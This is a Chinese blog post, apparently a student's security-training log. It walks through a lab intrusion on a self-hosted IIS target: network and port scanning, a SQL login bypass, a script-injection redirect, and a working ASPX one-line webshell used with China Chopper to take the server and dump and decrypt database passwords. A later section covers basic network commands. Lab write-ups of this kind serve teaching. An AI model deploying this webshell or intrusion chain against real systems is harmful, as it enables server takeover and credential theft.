实训周记录(5.3)

最新推荐文章于 2022-04-19 18:40:56 发布
最新推荐文章于 2022-04-19 18:40:56 发布
阅读量369 收藏
点赞数
分类专栏: 实训周记 文章标签: 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45786087/article/details/116378466
版权

信息时代的安全威胁

主要介绍了黑客与网络攻击和无处不在的安全威胁。

1. 首先需要利用工具在Windows上部署一个IIS web的网站。
安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务)
注意:加粗样式如果.net环境安装不全可在CMD下输入:
“%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe” -iru -enable
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
在这里插入图片描述
2. 使用局域网探查工具LanSee进入设置探查ip结果

在这里插入图片描述
3. 再利用端口扫描工具AdvancedPortScanner扫描主机的网段和主机IP。

在这里插入图片描述
4. 接下来是WEB扫描,首先打开御剑后台扫描工具开始扫描

在这里插入图片描述
5. 再利用网站漏洞扫描工具AWVS,安装破解之后,利用web scanner功能扫描一个网站,观察结果。

在这里插入图片描述
6. 漏洞利用——网站后台绕过
主要是根据登陆界面给出的反馈构造永真的SQL语句绕过登陆界面。

7 篡改页面内容
提交代码<script>window.location.href="http://d.mytanwan.com/h/26026.html"</script>
观察之后的效果

在这里插入图片描述

上传木马

一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

====================================================================
常见的网络命令

1. ipconfig/all
在这里插入图片描述
2. ipconfig/displaydns
在这里插入图片描述
3. 利用ping命令向www.baidu.com发送1000字节的数据包
在这里插入图片描述
4. 利用ping命令向www.baidu.com发送10000字节的数据包2个
在这里插入图片描述
5. 执行nslookup www.hbfu.edu.cn命令,获取该域名所对应的IP地址.
在这里插入图片描述
6. 在浏览器中访问网站www.hbfu.edu.cn,利用netstat -n查看本机网络状态,是否有关于www.hbfu.edu.cn网站的连接建立
在这里插入图片描述
7. 对局域网内其他主机和www.baidu.com分别执行tracert命令
在这里插入图片描述
8. 执行arp -a命令以及执行arp -d命令后立即执行arp -a命令
在这里插入图片描述

在这里插入图片描述

cytt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金融信息安全实训--网站漏洞利用
jyr2014的博客
06-11 1381
1、安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务)2、cmd运行如下命令:“%WINDIR%Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable在计算机管理中找到”服务“,开启asp.net服务 3、在IIS里部署网站,应用程序池选择.net 4.0,在该应用池的高级设置中把32位应用程序设置为True 4、成功部署IIS web站点后,使用IE浏览器打开站点。...
关于.net实习报告
11-14
实习包括总结包括每天具体都干什么,老师每天都讲什么,以及必要的代码,编程诀窍
实习记(软件开发)
06-21
实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习记实习
东软实训
04-25
东软实训记,总共18篇记,可以应付学校和培训机构的作业
毕业生实习报告(.net实习生)
05-15
2011年6月份毕业生在天津某公司实习的实习报告。主要方向.net
odbc mysql驱动5.3
07-07
标题中的"odbc mysql驱动5.3"指的是MySQL ODBC驱动的5.3版本,这是一个用于连接MySQL数据库的驱动程序,支持数据的读取、写入和查询操作。这个版本同时提供了32位和64位的版本,以适应不同的操作系统环境。 描述中...
核心协议5.3 核心协议5.3
12-03
《蓝牙Core v5.3:探索新一代无线连接技术》 蓝牙技术自诞生以来,一直扮演着无线连接领域的重要角色,特别是在个人局域网(PAN)应用中。随着科技的不断进步,蓝牙协议也在持续演进,以满足日益增长的需求。最新的...
aix5.3 ssh安装包
08-31
标题中的"aix5.3 ssh安装包"指的是适用于AIX 5.3操作系统的Secure Shell (SSH)软件包。SSH是一种网络协议,用于安全地在不同计算机之间进行远程登录和其他命令行交互。AIX(Advanced Interactive eXecutive)是IBM...
jmeter5.3.zip
02-24
Apache JMeter 5.3 是一个强大的性能测试工具,主要用于评估Web应用程序的性能和负载能力。JMeter由Apache软件基金会开发,是完全免费且开源的,适用于多种平台,包括Windows、Linux和Mac OS等。这款工具最初设计...
基于SpringBoot的实训管理系统的设计与实现- java - springboot - 实训管理系统的设计与实现代码
最新发布
01-11
基于SpringBoot的实训管理系统的设计与实现| java | springboot | 实训管理系统的设计与实现代码 | 网站 | 代码 1、技术栈:springboot,vue,ajax,maven,mysql,MyBatisPlus 2、系统的实现 用户信息 图片素材 ...
浅析基于asp.net的网站安全漏洞及防范
09-13
针对网络安全中出现的一些问题,介绍在sql注入式攻击、查询串式数据传递、绕过登录直接进入页面、输入框中输入恶意代码、数据库等几方面存在的漏洞,并对这些漏洞进行分析,提出一些防范建议,适合网管人员学习。
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7230
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
CVE-2014-1806 .NET Remoting Services漏洞浅析
weixin_33832340的博客
03-08 841
cssembly · 2014/11/24 12:020x00 简介Microsoft .NET Remoting是一种分布式处理方式,提供了一种允许对象通过应用程序域与另一对象进行交互的框架。前几天James Forshaw发布了CVE-2014-1806 .NET Remoting Services的漏洞利用程序,花了一些时间对其进行一下简单的调试分析。首先安装包含漏洞的.NET Framew...
金融信息安全实训-02
m0_53849665的博客
04-19 449
课堂笔记 网络探查与端口扫描 局域网探查工具LanSee 其他主机在局域网中共享一些文件。 运行网络查看工具LanSee.exe。 点击设置,输入要探查的ip地址段。 点击开始进行探查,观察探查结果。 端口扫描工具AdvancedPortScanner 打开AdvancedPortScanner软件,在主界面中选择Use range选项,填入准备扫描的网段或主机IP。 选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线
python面试题之如何在Python中创建自己的包
weixin_39363245的博客
05-05 1112
Python中创建包是比较方便的,只需要在当前目录建立一个文件夹, 文件夹中包含一个__init__.py文件和若干个模块文件, 其中__init__.py可以是一个空文件,但还是建议将包中所有需要导出的变量放到__all__中,这样可以确保包的接口清晰明了,易于使用。 作者:外星人入侵 链接:http://www.pythonheidong.com/blog/article/73/ ...
创建包
weixin_34128534的博客
08-04 117
创建包 Node.js 的包是一个目录,包含一个 JSON 格式的包说明文件 package.json。严格符合 CommonJS 规范的包应该具备以下特征: package.json 必须在包的顶层目录下; 二进制文件应该在 bin 目录下; JavaScript 代码应该在 lib 目录下; 文档应该在 doc 目录下; 单元测试应该在 test 目录下。 Node.js 对包...
2021-05-04
qq_44825720的博客
05-04 226
实训1-黑客入侵流程演练 实验目的 深入理解网络无安全的思想。 了解局域网查看软件Lansee的使用方法。 了解端口扫描软件AdvancedPortScanner的使用方法。 了解Web后台扫描软件御剑的使用方法。 了解网站漏洞扫描工具AWVS的使用方法。 了解Webshell连接工具中国菜刀的使用方法。 掌握端口及漏洞扫描的基本知识,能够利用工具进行扫描工作。 掌握网站入侵的一般流程。 ...
新手如何使用Eclipse创建包并且调用import语句使用这个包
满身尘土羡卢生。。。。。
10-11 6537
今天第一次使用Eclipse开发平台。。。嘿嘿。。错误请指出。。            使用eclipse工具在创建包时的简单指导           在Eclipse中创建新的包new-package,并写上你的包名,同时可以用同样的方法来创建下一层包    比如,edu.sdu.sdu1.....          1、 在新建包中创建类:此时需要使用package语句:package
ipconfig、ping命令、其他常用网络命令
qq_45935706的博客
05-07 2622
实验二、ipconfig、ping命令、其他常用网络命令 1、打开cmd,输入命令:ipconfig 查看本机配置IP地址、mac地址、DNS地址。 输入命令:ipconfig/diaplaydns 查看本机缓存了哪些服务器域名。 2、利用ping命令向www.baidu.com发送1000字节的数据包。命令:ping www.baidu.com -l 1000 利用ping命令向www.baidu.com发送10000字节的数据包2个。命令:ping -n 2 www.ba...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值